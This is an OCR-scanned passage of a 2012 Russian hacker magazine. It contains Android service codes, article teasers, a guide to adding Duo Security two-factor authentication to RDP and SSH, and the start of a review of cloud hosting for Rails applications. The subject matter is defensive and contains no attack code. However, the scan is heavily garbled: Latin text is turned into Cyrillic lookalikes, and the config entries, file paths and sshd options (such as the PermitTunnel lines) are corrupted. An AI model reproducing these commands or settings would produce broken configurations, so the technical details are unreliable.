Настраиваем голосовую почту 



• #06# — вывод номера ІМЕІ на экран 

• #*#4636#*#* — общая информация, 
продвинутые настройки, состояние 
батареи, статистика использования 
смартфона 

• #*#7780#*#* — сброс до заводских 
настроек, функция доступна также 
через меню 

• #*#8351#*#* — включение функции 
записи двадцати следующих разговоров 
в каталог 

/сіаіа/сіаіа/со т.а псі гоісі.ѵоісесііа Іег/а рр_ 
Іодсііг 

• #*#8350#*#* — отключение функции 
записи разговоров 

• *0 5* Р ЦІ К* Р I N *РІ N # — установка нового 
РІІЧ-кода 
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46 страниц на одной полосе. 
Тизер некоторых статей. 



Ргеѵіехл/ 



РС20МЕ 



36 



ЗА ДВОЙНОЙ БРОНЕЙ 

Включи двухфакторную авторизацию 
везде, где только можно. Ты волен забить 
на наш совет и вспомнить про него, когда 
утебяуведутлогин и парольдля почты. А 
можешь уделить 15 минут своего времени 
и легко укрепить стандартную схему 
аутентификацииспомощьюодноразо- 
выхпаролей. Идея простая:дажеесли 
у кого-то окажетсятвой пасс, им нельзя 
будетвоспользоваться без одноразо- 
вого ключа, который генерируется на 
твоемсмартфонеили приходитв виде 
5М5. Крупные компании тратят огромные 
деньги на внедрение такой схемы, а ты 
можешь использовать ее абсолютно 
бесплатно. 




РС20ЫЕ 



ВЗЛОМ 






РЕЛЬСЫ В ОБЛАКАХ 




ТРОПИЧЕСКИЙ АНЛИМ 




41 


Мы посмотрели на достоинства и 


58 


Когдаухакера просятденьгизато, 


62 




недостатки различныхоблачных 




что он оплачивать не привык, может 





платформ, чтобы предметно ответить произойти что угодно. Например, взлом 

тебе на вопрос: «Где хостить сайт?» биллинговой системы тайского отеля :). 



МАЛЕНЬКИЕ СЕКРЕТЫ БОЛЬШИХ ДЕНЕГ 

Люди серьезно зарабатывают на 5М5- 
подписках. Чтотворится внутри «серых» 
партнерских программ и что такое 
арбитраж трафика — читай в этой статье. 



ВЗЛОМ 



МАШАКЕ 





САМ 

5ЕС 

ѴѴЕ5Т 
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СЕРВЕРНЫЙ^: НОВЫЕ ИНЪЕКЦИИ 

Оказывается, Мосіе^'в может быть 
полезен для пентестера. Как? Чи- 
тай о новом методе атаки Бегѵег- 
Бісіе ^ѵаБсгірІ Ігцесііоп. 



72 



САЫ5ЕСѴѴЕ5Т 2012: КАК ЭТО БЫЛО 

Отчетиз Канады, где каждый год про- 
ходит популярная хакерская конферен- 
ция, известная нетолькоклассными до- 
кладами, но и конкурсом Осіау-сплоитов. 
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ГРОМИМ ФЕЙКОВЫЕ АНТИВИРУСЫ 

Объектом исследованияантивирусно- 
гоаналитика стали популярные РакеАѴ 
под Маси РС. Насколько прямые рукиу 
разработчиков подобной мал вари? 
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Антон Жуков (іНикоѵ.айгеаІ. хакер. ги) 




КАК УСИЛИТЬ БЕЗОПАСНОСТЬ 
С ПОМОЩЬЮ ОДНОРАЗОВЫХ ПАРОЛЕЙ 

Если для доступа к твоим данным единственным барьером является пароль, ты сильно рискуешь. 
Пасс можно сбрутить, перехватить, утащить трояном, выудить с помощью социальной инженерии. 
Не использовать при таком раскладе двухфакторную авторизацию — почти преступление. 
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За двойной броней 



ЗАЧЕМ НУЖНА ДВУХФАКТОРНАЯ АВТОРИЗАЦИЯ? 

Мы уже не раз рассказывали об одноразовых ключах. Смысл очень 
простой. Если злоумышленник каким-то образом сможет получить 
твой логин-пароль, то без проблем сможет зайти в твою почту или 
выполнить подключение к удаленному серверу. Но если на его пути 
будет дополнительный фактор, например одноразовый ключ (его 
также называют ОТР-ключом), то уже ничего не выйдет. Даже если 
такой ключ попадет к злоумышленнику, то воспользоваться им 
будет уже нельзя, так как валидным он является только один раз. 

В качестве такого второго фактора может быть дополнительный 
звонок, код, полученный по 5М5, ключ, сгенерированный на теле- 
фоне по определенным алгоритмам на основе текущего времени 
(время — способ синхронизировать алгоритм на клиенте и серве- 
ре). Тотже самый боодіе уже давно рекомендует своим пользовате- 
лям включить двухфакторную авторизацию (пара кликов в на- 
стройке аккаунта). Теперь пришла очередь добавить такой слой 
защиты и для своих сервисов! 

ЧТО ПРЕДЛАГАЕТ 000 5ЕСІІРІТѴ? 

Банальный пример. У моего компьютера «наружу» открыт РБР- 
порт для удаленного подключения к рабочему столу. Если логин- 
пароль утечет, злоумышленник сразу получит полный доступ 
к машине. Поэтому об усилении защиты ОТР-паролем вопрос даже 
не стоял — это нужно было просто сделать. Глупо было изобретать 
велосипед и пытаться реализовать все своими силами, поэтому я 
просто посмотрел решения, которые есть на рынке. Большинство 
из них оказались коммерческими (подробнее во врезке), однако 
для незначительного числа пользователей их можно юзать бес- 
платно. Для дома как раз то, что нужно. Одним из самых удачных 
сервисов, позволяющих организовать двухфакторную авторизацию 
буквально для чего угодно (включая ѴРІ\І, 55Н и РБР), оказался Био 
Бесигііу ( ѵѵѵѵѵѵ.сіиозесигііѵ.сот ). Привлекательности ему добавляло 
то, что разработчиком и фаундером проекта является Джон Обер- 
хайд, известный специалист по информационной безопасности. 

Он, к примеру, расковырял протокол общения боодіе со смартфо- 
нами АпсІгоісІ, с помощью которого можно установить или удалить 
произвольные приложения (читай статью «АпсІгоісІ-марионетки» 
в июньском «Хакере» за 2011 год). Такая база дает о себе знать: 
чтобы показать важность двухфакторной авторизации, парни 
запустили сервис ѴРІМ Нипіег ( ѵѵѵѵѵѵ.ѵрпЬипІег.сот ), который в два 
счета может найти неспрятанные ѴРІ\І-серверы компании (и заодно 
определить тип оборудования, на которых они работают), сервисы 
для удаленного доступа (ОрепѴРІМ, РБР, 55Н) и другие элемен- 
ты инфраструктуры, позволяющие злоумышленнику попасть 
во внутреннюю сеть, просто зная логин и пароль. Забавно, что 
в официальном Твиттере сервиса владельцы начали ежедневно 
публиковать отчеты о сканировании известных компаний, после 
чего аккаунт был забанен :). Сервис Био Зесигііу, само собой, на- 
целен прежде всего на внедрение двухфакторной аутентификации 



ОДНИМ ИЗ САМЫХУДАЧНЫХ 
СЕРВИСОВ ДЛЯ ДВУХФАКТОРНОЙ 
АВТОРИЗАЦИИ БУКВАЛЬНО ДЛЯ 
ЧЕГО УГОДНО (ВКЛЮЧАЯ ѴРЫ, 55Н 
И ВОР) ОКАЗАЛСЯ ОІЮБЕСиЮТѴ 

в компаниях с большим числом пользователей. К счастью для нас, 
есть возможность создать бесплатный РегзопаІ-аккаунт, позво- 
ляющий организовать двухфакторную аутентификацию для десяти 
пользователей бесплатно. 



ЧТО МОЖЕТ БЫТЬ ВТОРЫМ ФАКТОРОМ? 

Далее мы рассмотрим, как буквально за десять минутусилить 
безопасность подключения к удаленному рабочему столу, а также 
55Н на сервере. Но сперва хочу рассказать о том дополнительном 
этапе, который вводит Био Бесигііу в качестве второго фактора 
авторизации. Вариантов несколько: телефонный звонок, СМС 
с пасскодами, Био МоЬіІе пасскоды, Био РизЬ, электронный ключ. 

О каждом чуть подробнее. 

1. Телефонныйзвонок 

Если ты выберешь в качестве метода аутентификации телефон- 
ный звонок, то при каждом логине Био будет звонить тебе и про- 
сить нажать клавишу для подтверждения. Нажатие на клавишу # 
подтверждает твое намерение авторизоваться. Если же ты не за- 
ходил на сервер, но тебе позвонили из Био Бесигііу, то это может 
означать, что твой пароль попал кому-то в руки. В таком случае 
можно известить систему о попытке несанкционированного до- 
ступа, нажав на *. К слову, ты сам можешь в настройках аккаунта 
назначить, какой клавишей подтверждать аутентификацию, а на 
какой сигнализировать о попытке взлома. 

2. СМС-пасскоды 

В случае если ты выбрал метод аутентификации с помощью 
СМС-пасскодов, Био присылает тебе СМС с набором пасскодов 
(по умолчанию их будет десять). Для подтверждения своей 
личности тебе надо будет ввести в поле один из пасскодов, 
начинающийся с символа, указанного на экране. Если ты ис- 
пользовал все пасскоды, то можно запросить новую порцию. 

3. Био МоЬіІе пасскоды 

Ты можешь генерировать пасскоды для аутентификации 
с помощью приложения для мобильного телефона Био МоЬіІе 
(доступно іРЬопе, АпсІгоісІ, Раіт, ВІаскВеггу, ѴѴіпсІоѵѵз МоЬіІе). Но 
вся фишка этого метода в том, что он может быть использован 
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там, где нет сотовой связи или ѴѴі-Рі, поскольку приложение 
работает полностью оффлайн. Для успешной аутентифика- 
ции надо просто сгенерировать пасскод и ввести его. Как и в 
случае с СМС-пасскодами, пасскод можно использовать только 
единожды. Так что если кто-то его подсмотрит и попытается 
ввести, то не пройдет аутентификацию. Все, что требуется для 
данного метода, — это установить приложение йііо МоЬіІе на 
телефон. 

4. РиоризИ 

Для платформ АпбгоісІ и іРЬопе приложение йио МоЬіІе пред- 
лагает еще один способ авторизации — с помощью РивЬ- 
сообщений. При каждом заходе на сервер ты немедленно 
получишь запрос на авторизацию на своем телефоне и сможешь 
либо подтвердить, либо запретить ее одним нажатием. 

5. Электронный ключ 

Ну и наконец, пятая и последняя опция — является исполь- 
зование для аутентификации электронного ключа, который 
необходимо приобрести дополнительно. 

ПРОСТАЯ РЕГИСТРАЦИЯ 

Для защиты своего сервера с помощью йио Зесигііу необходи- 
мо скачать и установить специальный клиент, который будет 
взаимодействовать с аутентификационным сервером йио Зесигііу 
и обеспечивать второй слой защиты. Соответственно, этот клиент 
в каждой ситуации будет разным: в зависимости оттого, где имен- 
но необходимо реализовать двухфакторную авторизацию. Об этом 
мы поговорим ниже. Первое же, что необходимо сделать, — заре- 
гистрироваться в системе и получить аккаунт. Поэтому открываем 
главную страницу сайта, нажимаем «Ргее ТгіаІ», на открывшейся 
странице нажимаем кнопку «5іпд ир» под типом аккаунта РегвопаІ. 
После чего нас просят ввести имя, фамилию, адрес электронной 
почты и название компании. На почту должно прийти письмо, 
содержащее ссылку для подтверждения регистрации. При этом 
система обязательно выполнит автоматический дозвон по указан- 
ному телефону: для активации аккаунта надо ответить на звонок 
и нажать на телефоне кнопку #. После этого аккаунт будет актив- 
ным и можно приступать к боевым испытаниям. 

ЗАЩИЩАЕМ РйР 

Выше я говорил, что начинал с большого желания обезопасить 
удаленные подключения к своему рабочему столу. Поэтому в каче- 
стве первого примера опишу, какусилить безопасность РйР. 

1. Любое внедрение двухфакторной авторизации начинается 

с простого действия: создания в профиле йио Зесигііу та к на- 
зываемой интеграции. Переходим в раздел «Іпіедгаііопз -> 
ЫеѵѵІпІедгаЛоп», указываем имя интеграции (например, «Ноте 
РйР»), выбираем еетип «МісгозоЙ РйР» и нажимаем «АсИ 
ІпІедгаЛоп». 

2. В появившемся окне выводятся параметры интеграции: 
Іпіедгаііоп кеу, Зесгеі кеу, АРІ бозіпате. Они нам понадобятся 
позже, когда мы будем настраивать клиентскую часть. Важно 
понимать: знать их никто не должен. 

3. Далее необходимо поставить на защищаемую машину специ- 
альный клиент, которыйустановитвсе необходимое в ѴѴіпсІоѵѵз- 
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За двойной броней 



ДОПОЛНИТЕЛЬНЫЕ НАСТРОЙКИ 



Если зайти в свой аккаунт Оио Бесигііу 
и перейти в раздел «5еіііпд5», то можно 
подкрутить под себя некоторые настройки. 
Первый важный раздел — это «РИопе са I Із». 
Тут указываются параметры, которые будут 
действовать, когда для подтверждения 
аутентификации будет задействован 
телефонный звонок. Пункт «Ѵоісе саІІ- 
Ьаск кеуз» позволяет задать, на какую 
клавишу телефона надо будет нажать 



для подтверждения аутентификации. По 
умолчанию там стоит значение «Ргез5 апу 
кеу іо аиіііепіісаіе» — то есть можно жать на 
любую. Если же установить значение «Ргезз 
сііііегепі кеуз іо аиіЬепіісаіе ог герогі ігаисі», 
то нужно будет задать две клавиши: нажатие 
на первую подтверждает аутентификацию 
(Кеу іо аиіііепіісаіе), нажатие на вторую 
(Кеу іо герогі ігаисі) означает, что процесс 
аутентификации инициировали не мы, то 



есть кто-то получил наш пароль и пытается 
сего помощью зайти на сервер. Пункт «5 М5 
раззсосіе5» позволяет задать количество 
пасскодов, которое будет содержать одна 
эсэмэска, и время ихжизни (валидности). 
Параметр «1_оскоиі апсі ігаисі» позволяет 
задать адрес электронной почты, на который 
будет приходить оповещение в случае 
определенного числа неудачных попыток 
авторизоваться на сервере. 




систему. Егоможноскачатьсофициального сайта или взять 
с нашего диска. Вся его настройка сводится ктому, что в процессе 
установки необходимо будет ввести упомянутые выше Іпіедгаііоп 
кеу, Зесгеі кеу, АРІ Ьозіпате. 

4. Вот, собственно, и все. Теперь при следующем заходе на сервер 
по РОР на экране будеттри поля: имя пользователя, пароль и од- 
норазовый ключ Оио. Соответственно, с од ним только логи ном - 
паролем выполнить вход в систему уже нельзя. 

При первой попытке захода в систему новому пользователю не- 
обходимо будет единожды пройти процедуру проверки йио Бесигііу. 
Сервис будет выдавать ему специальную ссылку, перейдя по которой 
необходимо ввести свой номер телефона и ждать проверяющего 
звонка. Чтобы получить дополнительные ключи (или получить их 
в первый раз), можно ввести ключевое слово «зтз». В случае если 



ты хочешь пройти аутентификацию при помощи телефонного звонка 
— введи «рЬопе», если при помощи йио РизЬ — «ризЬ». Историю 
всех попыток подключения (как удачных, так и неудачных) к серверу 
можно посмотреть в своем аккаунте на сайте йио Бесигііу, предвари- 
тельно выбрав нужную интеграцию и зайдя в ее «АиіЬепіісаііоп І_од». 

ЗАЩИЩАЕМ 55Н 

Рассмотрим еще один тип интеграции — «ІЛЧІХ Іпіедгаііоп», чтобы 
реализовать безопасную аутентификацию. Добавляем еще одну 
интеграцию в своем профиле йио Бесигііу и приступаем кустанов- 
ке клиента в системе. 

Исходники последнего ты можешь скачать по адресу Ьіі.Іѵ/ 
ІсбдкО или взять с нашего диска. Я использовал последнюю вер- 
сию — 1.8. Кстати, клиент работает на большинстве піх-платформ, 
так что его можно будет спокойно установить на РгееВЗй, ІЧеіВБО, 
ОрепВБй, Мае 05 X, ЗоІагіз/ІІІитоз, НР-ІІХ и АІХ. 

Процесс сборки стандартен — сопіідиге && таке && зисіо таке 
іпзіаІІ. Единственно, я бы рекомендовал использовать сопіідиге 
с опцией --ргеііх=/изг, иначе при запуске клиент может не найти 
необходимых библиотек. После успешной установки идем редакти- 
ровать конфигурационный файл /еіс/сіио/іодіп сіио.сопі. Это нужно 
делать из-под рута. Все изменения, которые необходимо внести 
для успешной работы, — это задать значения Іпіедгаііоп кеу, Зесгеі 
кеу, АРІ Ьозіпате, которые можно узнать на странице интеграции. 

[сіио] 

; Рио іпііе^гаіііоп кеу 

ікеу = ІІ\ІТЕСКАТІОІ\І_КЕѴ 

; Рио зесгеі: кеу 

5кеу = 5ЕСКЕТ_КЕУ 

; Рио АРІ іюзііпате 

ііозі: = АРІ Н05ТІМАМЕ 



Чтобы заставить всех пользователей, заходящих на твой сервер 



ПОДКЛЮЧАЕМ ОІЮ 5ЕСІІШТѴ ГДЕ УГОДНО! 



С помощью двухфакторной авторизации 
можно защищать не только РОР или 55Н, 
но и ѴРІМ, РА0Ш5-серверы, любые веб- 
сервисы. Например, существуют готовые 
клиенты, добавляющие дополнительный слой 
аутентификации в популярные движки ОгираІ 
и ѴѴогсіРгезз. Если готового клиента нет. 



расстраиваться не стоит: ты всегда можешь 
самостоятельно добавить двухфакторную 
аутентификацию для своего приложения или 
сайта при помощи АРІ, предоставляемого 
системой. Логика работы с АРІ проста — ты 
делаешь запрос на ЫРЬ определенного 
метода и парсишь возвращаемый ответ. 



который может прийти в формате Э50ІМ (или 
же В50ІЧ, ХМ1_). Полная документация по Оио 
РЕ5Т АРІ доступна на официальном сайте. 

Я лишь скажу, что существуют методы ріпд, 
сЬеск, ргеаиіЬ, аиіН, зіаіиБ, из названия 
которых несложно догадаться, для чего они 
предназначены. 
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РС20ЫЕ 



ДОЛГО ЛИ МОЖНО ИСПОЛЬЗОВАТЬ БЕСПЛАТНО? 



Какуже было сказано, йио Бесигііу предлагает 
специальный тарифный план «РегзопаІ». Он 
абсолютно бесплатен, но количество пользова- 
телей должно быть не более десяти. Поддер- 
живает добавление неограниченного числа 
интеграций, все доступные методы аутенти- 
фикации. Предоставляет тысячу бесплатных 
кредитов на услуги телефонии. Кредиты — это 



как бы внутренняя валюта, которая списывается 
с твоего аккаунта каждый раз, когда происходит 
аутентификация с помощью звонка или СМС. 

В настройках аккаунта можно выставить, чтобы 
при достижении заданного числа кредитов тебе 
на мыло пришло уведомление и ты успел по- 
полнить баланс. Тысяча кредитов стоит всего 30 
баксов. Цена на звонки и СМС для разных стран 



отличается. Для России звонок будет обхо- 
диться от 5 до 20 кредитов, СМС — 5 кредитов. 
Однако за звонок, происходящий при аутенти- 
фикации на сайте йио Бесигііу, ничего не списы- 
вается. Про кредиты можно совсем забыть, если 
использовать для аутентификации приложение 
Оио МоЬіІе — за него ничего не взимается. 



по 55Н, использовать двухфакторную аутентификацию, достаточно 
добавить следующую строку в файл /еІіс/ззЬ/ззЬсІ сопІ'ід: 

> РогсеСоттапсІ /иБг/ІосаІ/зЬіп/Іо ^і п сіио 

Существует также возможность организовать двухфакторную 
авторизацию только для отдельных пользователей, объединив их 
в группу и указав эту группу в файле Іодіп сіио.сопі": 

> §гоир = ыііееі 

Для вступления изменений в силу остается только перезапу- 
стить ззЬ-демон. С этого момента после успешного ввода логина- 
пароля пользователю будет предложено пройти дополнительную 
аутентификацию. 

Следует отдельно отметить одну тонкость настройки ззЬ — на- 
стоятельно рекомендуется отключить в конфигурационном файле 
опции РегтіГГиппеІ и АІІоѵѵТсрРогѵѵагсІіпд, так как демон применяет 
их до того, как запустить второй этап аутентификации. Таким об- 
разом, если злоумышленник правильно вводит пароль, то он может 
получить доступ к внутренней сети до завершения второго этапа 
аутентификации благодаря порт-форвардингу. Чтобы избежать 
такого эффекта, добавь следующие опции в 5зМ_сопПд: 

РегшіІіТиппеІ по 
АІ1оѵЛ~срРонл/агс1іп% по 

Теперь твой сервер находится за двойной стеной и попасть на 
него злоумышленнику куда более затруднительно. 




Удаленный рабочий стол, защищенный двухфакторной аутентификацией 



ИСПОЛЬЗУЙ! 

Удивительно, но многие по-прежнему игнорируют двухфакторную 
авторизацию. Не понимаю почему. Это действительно очень се- 
рьезно усиливает безопасность. Реализовать ее можно практи- 
чески для всего, а достойные решения доступны бесплатно. Так 
почему? От лени или от беспечности. ПЕ 



СЕРВИСЫ-АНАЛОГИ 



Бідпііу 

ѵѵѵѵѵѵ.зідпіГѵ.пеІ 

Сервис предоставляеттри варианта для 
организации двухфакторной аутентификации. 
Первый — использование электронных 
ключей. Второй способ — использование 
пасскеев, которые посылаются пользователю 
на телефон посредством СМС или приходят 
на электронную почту. Третий вариант — 
мобильное приложение для телефонов Апсігоісі, 
іРИопе, ВІаскВеггу, которое генерирует 
одноразовые пароли (по сути, аналог йио 
МоЬіІе). Сервис нацелен на крупные компании, 
поэтому полностью платный. 



БесигЕпѵоу 

ѵѵѵѵѵѵ.зесигепѵоѵ.сот 

Также позволяет использовать мобильный 
телефон в качестве второго защитного слоя. 
Пасскеи отправляются пользователю по СМС 
или на электронную почту. Каждое сообщение 
содержиттри пасскея, то есть пользователь 
можеттри раза авторизоваться, перед тем как 
запросит новую порцию. Сервис также является 
платным, но предоставляет бесплатный 
30-дневный период. Существенным плюсом 
является большое число как родных, так 
и сторонних интеграций. 



РЬопеГасІог 

ѵѵѵѵѵѵ.рЬопеГасІог.сот 

Данный сервис позволяет бесплатно 
организовать двухфакторную аутентификацию 
до 25 пользователей, предоставляя 500 
бесплатных аутентификаций в месяц. Для 
организации защиты необходимо будет скачать 
и установить специальный клиент. В случае 
необходимости добавления двухфакторной 
аутентификации на сайт можно воспользоваться 
официальным БОК, предоставляющим 
подробную документацию и примеры для 
следующих языков программирования: А5Р.МЕТ 
С#, А5Р.МЕТ ѴВ, Эаѵа, РегІ, РиЬу, РНР. 
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РС20ЫЕ 



Максим Петрунин, сооснователь сервиса «Таксовик» (іахоѵік.ги) 




Рельсы 

В ОБЛАКАХ 



ВЫБОР ОБЛАЧНОГО ХОСТИНГА ДЛЯ ПРИЛОЖЕНИЯ 



Когда я столкнулся 
с простым вопросом «Где 
хостить мой проект?», среди 
моря информации на эту 
тему я так и не смог найти 
четкого ответа. Пришлось 
заняться самостоятельным 
исследованием. 

Не претендую на 
всеохватность, но, думаю, 
мои изыскания окажутся 
полезными для человека, 
выбирающего облачный 
хостинг или ѴйБ. 



разу хочу предупредить: я искал плат- 
форму для размещения приложения, 
написанного на РиЬу оп Раііз (в народе 
«рельсов»). Собственно, отсюда и название 
материала. Впрочем, обзор будет интересен и 
адептам других веб-технологий. Поддержка 
«рельсов» не всегда, но, как правило, свиде- 
тельствует о продвинутости площадки, а это 
уже точно хорошо. Если перед тобой стоит вы- 
бор, где разместить сайт, то я попробую помочь 
тебе определиться. 

ПОСТАНОВКА ЗАДАЧИ 

Стандартный хостинг в привычном понима- 
нии годится разве что для совсем простых 
проектов. Мне был нужен более продвинутый 
вариант, который мог бы выдерживать боль- 
шие и пиковые нагрузки. Поэтому я и целился 
в облака. Выбирая решение, я сформулировал 
для себя четкий список требований: 

• Высокая скоростьзагрузки. Я хочу, чтобы 
страницы моих сайтов отдавались поль- 
зователям какможнобыстрее. Оценка 
этого параметра производилась с помощью 



сервиса ЬозЫгаскег. 

• Надежность. Я хочу 5І_А и ирііте 99,9% (то 
есть не более 8-9 часов простоя в год). 

• Доступ кпланировщикусгоп, поскольку 
уменя вприложенияхестьнесколько 
«ботов», завязанных на стоп. 

• Возможностьработы с поддоменами. 

• Желательно поддержка 551. 

• Возможность развернуть Раііз 3 — прило- 
жение. 

• Готовностькпиковым нагрузкам. Как 
и любой стартапер, я ожидаю роста 
посещаемости и всплесков нагрузки 
(например, после хабраэффекта). Хостинг 
должен легко их выдержать. 

• Желательно низкая цена. Особенно если 
учесть, что не все проекты коммерческие. 

С четырьмя хостингами я имел дело лично: 

ЮЬ.ги, СЫо, РаскзрасеСІоисІ, Негоки, 

поэтому расскажу о них в первую очередь. 

О других могу судить только по отзы- 
вам коллег — это косит, МесПаІетрІе, 

Епдіпе ѴагсІ, Атагоп ѴѴеЬ 5егѵісез, Ыпосіе, 
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РС20ЫЕ 



ІОЬ.ги 



Сайт: ѵѵѵѵѵѵ.ІаЬ.ги 

Тип: ѴР5, Ѵй5 

Тест скорости: Ьіі.1у/НСЦ83у 

Начнем схостинга 16Ь, так как на нем почти два 
года размещался наш сервис «Таксовик». С 1 0Ь 
мы успешно выдержали ведомости-, хабра-, 
экслер-, рамблер- и прочие эффекты (до плюс 10 
тысяч пользователей в день, высокие пиковые 
нагрузки). ІбЬ предоставляетхорошие серверы, 
преднастроенные е-таіі-, тузрі- и подобные 
модули с нулевым временем доступа с твоего 
сервера и отличную панельуправления. У ІбЬ 
отзывчивая и вменяемая русскоговорящая 
техподдержка, выполнившая почти все просьбы, 

СІосІо 



Сайт: сЫо.ги 

Тип: Ѵ65, Іаа5 

Тест скорости: ЬИ.Іѵ/І Ѵа 0 РѴѴ 

Русский облачный хостинг, изначально 
размещавшийся в дата-центре «Оверсан- 
Меркурий»; затем он расширился в центр 
обработки данных «КІАЕН01І5Е» и располо- 
жился на территории национального исследо- 
вательского центра «Курчатовский институт». 
Тест скорости, как и в случае с ІбЬ, снова 
проводится по главной странице «Таксови- 
ка». По Москве и Питеру этот тест показал 
около 0,01 секунды, а в среднем по миру -0,34 
секунды — это лучшая скорость, которую 
можно увидеть в обзоре. Цены у СІосІо зависят 
от потребляемых ресурсов. СІосІо — это самое 
натуральное облако с оплатой за часы или за 
объемы потребляемых ресурсов, причем цены 

Каскзрасе 



Сайт: ѵѵѵѵѵѵ.гаскзрасе.сот 

Тип: Іаа5 

Тест скорости: Ьіі.1у/І34з73 

Раскзрасе, в который влился бІісеНозЦ 
славится своей фантастической поддержкой. 
Это действительно так. Всякий раз, когда я 
обращался в техподдержку Раскзрасе, мои 
проблемы решались быстро, причем люди 
явно хотели помочь, а не формально «закрыть 
тикет». Один нюанс — техподдержка англоя- 
зычная. У Раскзрасе более-менее нормальные 
цены на облака. На живом Раііз-приложении, 
если учитывать невысокий трафик, выходит 
около 23 долларов в месяц. Используя этотхо- 
стинг, можно недорого, легко и быстро развер- 
нуться, а потом уверенно работать. За почти 
два года не было ни одного простоя длитель- 
ностью более минуты. Для клиентов в наличии 
іРЬопе- и АпсІгоісІ-приложения для управления 



которые у нас возникли (установка специфиче- 
ских пакетов, донастройка сервера под наши 
нужды и прочее). Отметим, что у сервиса непло- 
хие цены, которые со временем становятся еще 
лучше. С другой стороны, каку многих русских 
хостингов, здесь никакого тебе 5І_А и ирЬте 
99,9%. Наш сайт лежал примерно 20-30 часов 
в год и мог падать почти каждый месяц. Это, 
конечно, очень портит впечатление. Еще один 
маленький минус ІбЬ: на сервераху них стояла 
старенькая бепіоо, из-за чего мы не смогли вос- 
пользоваться некоторыми важными решениями. 

ВЫВОДЫ: неплохой, но далеко не идеальный 
русский хостинг. 



■ О. 




у него неплохие. Опыт показывает, что этот 
хостинг обойдется в 300-500 рублей в месяц 
за 32-битный сервер под средней нагрузкой 
и 250 — 300 рублей за 64-битный сервер под 
почти нулевой нагрузкой. 

Для серверов у СІосІо в удобной пане- 
ли управления можно задавать пределы 
автоматического масштабирования сервера. 
СІосІо гарантирует аптайм 99,9% и вывешивает 
на своем сайте 5І_А. Если же тебе не хочется 
облаков, то в наличии есть и простые Ѵ65 по 
отличным ценам. Впрочем, и тут не обошлось 
без ложки дегтя. В первые полгода заявлен- 
ный аптайм не соблюдался даже близко и 
были частые, иногда глобальные падения. 
Правда, в последние шесть месяцев ситуа- 
ция со сбоями более-менее выправилась, и 
сейчас действительность гораздо больше 
соответствует обещаниям. Из небольших 




минусов вспоминается, что иногда техпод- 
держка на вопросы о сбоях отвечает фразами 
в стиле «Как, вы не знаете? Об этом сбое мы 
сообщали в нашем твиттере!» 

ВЫВОДЫ: хороший пример облака по типу 
Іааб от наших соотечественников с прекрас- 
ной скоростью доступа. 



хостингом, которые, однако, не компенсируют 
не очень удачную, на наш взгляд, притор- 
маживающую панельуправления. Помимо 
собственно развертывания серверов за допол- 
нительные деньги доступно автомасштабиро- 
вание нагрузки через распределение трафика 
по разным твоим серверам. Раскзрасе вообще 
неплохо подходит для выдерживания повы- 
шенного трафика. Так, я наткнулся на отзыв, 
в котором хостинг хвалят за то, что высокий 
приток посещаемости в 40 тысяч посетителей 
стоил всего семь дополнительных баксов. 

Надо отметить, что Раскзрасе — это реше- 
ние, конечно, «менее облачное», чем СІосІо или 
Негоки, и на самом деле выглядит как ѴОЗ'ка 
с подсчетом трафика. При работе с Раскзрасе 
ты можешь ощутить это неудобство: 256 Мб 
маловато даже для Раііз-приложения с нуле- 
вой нагрузкой, и ты можешь оказаться вынуж- 
денным брать сервер с 512 Мб памяти, чтобы 




страница твоего сайта открывалась всегда. 

И платить тебе придется примерно в два раза 
больше, в отличие от, например, СІосІо, где 
бы ты заплатил ровно за ту память, которую 
потребил (коэффициент в этом случае мог бы 
быть 1,3 или 1,5). 

ВЫВОДЫ: один из лучших вариантов по со- 
отношению цена/надежность, но не очень-то 
рассчитывай на облачность. 



042 



ХАКЕР 06/161/2012 



МІ Й I ' И 



Рельсы в облаках 



Негоки 



Сайт: бегоки.сот 

Тип: РааБ 

Тест скорости: Ьіі.іѵ/Л СІІ5д 

Негоки — это облако (облачнее не бывает) по 
типу РааБ, которое базируется на инфраструк- 
туре от Атагоп. Они начинали как онлайновый 
текстовый редактор для РиЬу, но превратились 
в один из самых удобных Раііз-хостингов. К 
слову, недавно они наняли на работу Юкихиро 
Мацумото, создателя языка РиЬу. По историче- 
ским причинам на этом хостинге наблюдается 
очень мощная заточка под рельсы (впрочем, 
поддерживаются и некоторые другие техноло- 
гии). У Негоки шикарная система дополнений, 
которая позволяет очень легко прикрутить 
к твоему сайту что угодно из их списка: от 
тетсасЬе до продвинутого мониторинга или 
шлюза отправки СМС. Твое приложение будет 
крутиться на специально настроенных бупо 
(вычислительная единица). Одно такое бупо 
по обещаниям обрабатывает 10-100 запросов 
в секунду. Ты не можешь влезть в кишки бупо, 
зато вся инфраструктура уже настроена про- 
фессионалами. Это и тот факт, что развертыва- 
ние приложения осуществляется через систему 



контроля версий діі, позволяет сэкономить на 
системном администраторе. Для обслуживания 
сервера на Негоки почти нет необходимости 
знать что-то такое, чего не знает обычный 
Раііз-разработчик. Но работая с этим хостин- 
гом, надо понимать, что любое отклонение от 
предустановок или возможностей дополнений 
может вызвать проблемы. Например, чтобы 
организовать запуск регулярных задач чаще, 
чем раз в 10 минут, придется прибегать к само- 
писным костылям. 

К сожалению, за все удобство нужно 
платить, и на Негоки за каждый шаг с тебя 
будут брать денежку. К примеру, за почасовой 
(а не подневный) сгоп — 3 доллара в месяц, за 
55Б — 5 долларов, за поддержку доменов вида 
*.туботаіп.ги — тоже 5 долларов. В совокуп- 
ности все очень дорого. Что приятно, на Негоки 
есть бесплатный тариф, правда, пригодится 
он разве что для домашней странички моей 
собаки. Он включает в себя 750 часов работы в 
месяц одного бупо и не более 5 Мб для данных 
в БД. За больший объем БД придется платить 
уже 15 долларов, а если понадобится более 
одного бупо, то выложите по 35 долларов за 
штуку. Тест скорости показывает весьма при- 



Ьосит 




личные результаты. Что касается надежности, 
интересен один случай. Сервис «СЬеар апб 
беаіу», которые хостились на Хероку, писали, 
что упали от рамблер-эффекта. Как можно 
упасть от рамблер-эффекта с сайтом их типа 
на облачном хостинге, заточенном под такого 
рода задачи, для меня загадка. Возможно, 
дело в кривых руках программистов, потому 
что почти все остальные отзывы сугубо по- 
ложительные (пока не вспоминают про цену, 
конечно). Если тебя интересует автомасшта- 
бирование, то в природе существует соответ- 
ствующий скрипт ( ЬіЕІу/сБ4Ыі ). 

ВЫВОДЫ: очень круто и очень дорого. 



Сайт: Іосит.ги 

Тип: ѴР5, ѴйБ 

Тест скорости: Ьі1:.1у/б4дпит 

По Москве и Питеру скорость загрузки около 
0,04 секунды, что неплохо, в среднем по миру 
~0,8, что так себе. Хостинг изначально по- 
зиционировался как Раііз-ориентированный, 
